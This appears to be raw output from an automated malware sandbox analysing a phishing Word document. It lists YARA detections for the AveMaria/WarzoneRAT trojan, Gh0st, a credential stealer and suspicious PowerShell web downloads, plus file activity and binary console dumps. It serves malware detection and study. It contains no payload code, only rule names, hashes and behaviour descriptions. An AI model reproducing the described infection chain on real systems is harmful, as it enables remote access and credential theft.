Source: 8.2.explorer.exe.28edf2c.6.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 8.2.explorer.exe.28edf2c.6.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 8.2.explorer.exe.28edf2c.6.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 8.2.explorer.exe.28edf2c.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 8.2.explorer.exe.28edf2c.6.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 8.2.explorer.exe.3a0d418.10.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 8.2.explorer.exe.3a0d418.10.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 8.2.explorer.exe.3a0d418.10.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 8.2.explorer.exe.3a0d418.10.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 8.2.explorer.exe.3a2b638.11.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 8.2.explorer.exe.3a2b638.11.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 8.2.explorer.exe.3a2b638.11.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 8.2.explorer.exe.3a2b638.11.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 00000011.00000003.964034718.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 00000013.00000002.962831144.0000000001B86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
Source: 00000011.00000003.963529024.00000000006B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 00000014.00000002.985267506.000000000289A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 00000014.00000002.985267506.000000000289A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 00000004.00000002.916223647.00000000000BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
Source: 00000011.00000003.964229410.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 00000004.00000002.916206520.0000000000080000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
Source: 00000004.00000002.916206520.0000000000080000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, score = file, reference = https://goo.gl/uAic1X, modified = 2022-09-15
Source: 00000011.00000000.956682708.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 00000008.00000002.971704816.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 00000008.00000002.971704816.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 00000009.00000002.937256768.0000000001BA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
Source: 00000011.00000000.957645359.000000000054F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 00000011.00000003.963466175.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 00000004.00000002.916438854.0000000001B86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
Source: 00000011.00000003.963980442.00000000006B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 00000013.00000002.961202850.000000000010E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
Source: 00000013.00000002.961145654.00000000000D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
Source: 00000013.00000002.961145654.00000000000D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, score = file, reference = https://goo.gl/uAic1X, modified = 2022-09-15
Source: 00000009.00000002.936804353.0000000000350000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
Source: 00000009.00000002.936804353.0000000000350000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, score = file, reference = https://goo.gl/uAic1X, modified = 2022-09-15
Source: 00000009.00000002.936976360.00000000003D9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
Source: 0000001D.00000002.1032860739.00000000028B4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 0000001D.00000002.1032860739.00000000028B4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 1312, type: MEMORYSTR Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
Source: Process Memory Space: powershell.exe PID: 2072, type: MEMORYSTR Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
Source: Item Selection - Inquiry 0054363AZH - AltayGlobal Trading.LNK.0.dr LNK file: ..\..\..\..\..\Desktop\Item Selection - Inquiry 0054363AZH - AltayGlobal Trading.doc
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$em Selection - Inquiry 0054363AZH - AltayGlobal Trading.doc Jump to behavior
Source: classification engine Classification label: mal100.phis.troj.expl.evad.winDOC@43/31@2/2
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\Program Files\Microsoft DN1 Jump to behavior
Source: MSBuild.exe, 0000001A.00000002.983934505.0000000003200000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: .configAMSBUILDDIRECTORYDELETERETRYCOUNTCMSBUILDDIRECTORYDELETRETRYTIMEOUT.sln
Source: MSBuild.exe, 0000001A.00000002.983934505.0000000003200000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: MSBuild MyApp.sln /t:Rebuild /p:Configuration=Release
Source: MSBuild.exe, 0000001A.00000002.983934505.0000000003200000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb
Source: MSBuild.exe, 0000001A.00000002.983934505.0000000003200000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdbD
Source: MSBuild.exe, 0000001A.00000002.983934505.0000000003200000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: *.sln
Source: MSBuild.exe, 0000001A.00000002.983934505.0000000003200000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: MSBuild MyApp.csproj /t:Clean
Source: MSBuild.exe, 0000001A.00000002.983934505.0000000003200000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: /ignoreprojectextensions:.sln
Source: MSBuild.exe, 0000001A.00000002.983934505.0000000003200000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: MSBUILD : error MSB1048: Solution files cannot be debugged directly. Run MSBuild first with an environment variable MSBUILDEMITSOLUTION=1 to create a corresponding ".sln.metaproj" file. Then debug that.
Source: ~WRF{C4F4A2E4-AFFD-48B2-B382-6AEAEB7457BF}.tmp.0.dr OLE document summary: title field not present or empty
Source: ~WRF{C4F4A2E4-AFFD-48B2-B382-6AEAEB7457BF}.tmp.0.dr OLE document summary: author field not present or empty
Source: ~WRF{C4F4A2E4-AFFD-48B2-B382-6AEAEB7457BF}.tmp.0.dr OLE document summary: edited time not present or 0
Source: Item Selection - Inquiry 0054363AZH - AltayGlobal Trading.doc ReversingLabs: Detection: 32%
Source: Item Selection - Inquiry 0054363AZH - AltayGlobal Trading.doc Virustotal: Detection: 50%
Source: C:\Users\user\AppData\Roaming\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................p.......#.................j.....p.........j.......e.....`Ig.......bw.....................Kn.....................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....#................Rfk....X.t.............................}.dw......t.....0...............X.Y.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w..../.......u.r.i.n.g. .a. .W.e.b.C.l.i.e.n.t. .r.e.q.u.e.s.t...".....t.....0.................Y.....6.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w..../................Rfk......t.............................}.dw....H.t.....0...............X.Y.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....;.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.7...............}.dw....X.t.....0.................Y.....".......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....;................Rfk......t.............................}.dw......t.....0...............X.Y.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....G................Qfk....."Y.............................}.dw....X.t.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....G................Rfk......t.............................}.dw......t.....0...............X.Y.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....S................Qfk....."Y.............................}.dw....H.t.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....S................Rfk......t.............................}.dw......t.....0...............X.Y.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w...._................Qfk....."Y.............................}.dw....@.t.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w...._................Rfk......t.............................}.dw....x.t.....0...............X.Y.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....k................Qfk....."Y.............................}.dw......t.....0.......................f.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....k................Rfk....h.t.............................}.dw......t.....0...............X.Y.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................E.......w....... ........Qfk....."Y.............................}.dw....x.t.....0.................Y.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....w................Rfk....0.t.............................}.dw......t.....0...............X.Y.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................#...............(.P.............,.......p........^......................0.......#....................................... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................#...............(.P.............,.......p........_......................0.......#....................................... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ......................../...............(.P.............,.......p.......<_......................0......./.......................h............... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ......................../...............(.P.............,.......p.......X_......................0......./....................................... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................;...............(.P.............,.......p........_......................0.......;...............|.......h............... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................;...............(.P.............,.......p........_......................0.......;....................................... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7........_......................0.......G...............".......h............... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................G...............(.P.............,.......p........_......................0.......G.......................h............... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................S...............(.P.............,.......l........`......................0.......S.......................h............... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................S...............(.P.............,.......l.......&`......................0.......S....................................... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................_.......u.y...e.x.e.............,.......l.......P`......................0......._.......................h............... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................_...............(.P.............,.......l.......l`......................0......._.......................h............... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................k...............(.P.............,.......p........`......................0.......k.......................h............... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................k...............(.P.............,.......p........`......................0.......k....................................... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w...............2.......h............... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................w...............(.P.............,.......l........a......................0.......w.......................h............... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.............,.......p.......:a......................0.......................l.......h............... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.............,.......p.......Wa......................0............................................... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................ .......(.P.............,.......p........a......................0...............................h............... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.............,.......l........a......................0...............................h............... Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Console Write: ........................................(.P.....................h......./_................................................................)..... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................p.......#.........=.......r.....p.........r.......m.....`Io.......bw.....................Kv.....................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....#...............M.Xk....p|..............................}.dw.....|......0.A..............#d.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w..../.......u.r.i.n.g. .a. .W.e.b.C.l.i.e.n.t. .r.e.q.u.e.s.t..."...(.......0.A.............."d.....6.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w..../...............M.Xk....................................}.dw....`.......0.A..............#d.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....;.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.7...............}.dw....p.......0.A.............."d.....".......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....;...............M.Xk....(...............................}.dw............0.A..............#d.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....G.................Xk....@&d.............................}.dw....p.......0.A.............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....G...............M.Xk....(...............................}.dw............0.A..............#d.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....S.................Xk....@&d.............................}.dw....`.......0.A.............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....S...............M.Xk....................................}.dw............0.A..............#d.............................
